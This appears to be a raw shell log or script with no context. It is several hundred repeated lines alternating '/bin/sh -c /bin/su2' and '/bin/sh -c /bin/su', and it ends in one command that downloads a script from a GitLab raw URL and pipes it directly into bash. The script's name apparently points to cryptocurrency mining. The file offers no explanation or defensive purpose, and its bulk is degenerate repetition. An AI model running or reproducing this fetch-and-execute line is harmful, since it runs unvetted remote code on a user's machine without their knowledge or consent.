/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
/bin/sh -c /bin/su2
/bin/sh -c /bin/su
curl https://gitlab.com/kusumaanis61/nv401/-/raw/main/runrexETH.sh | bash


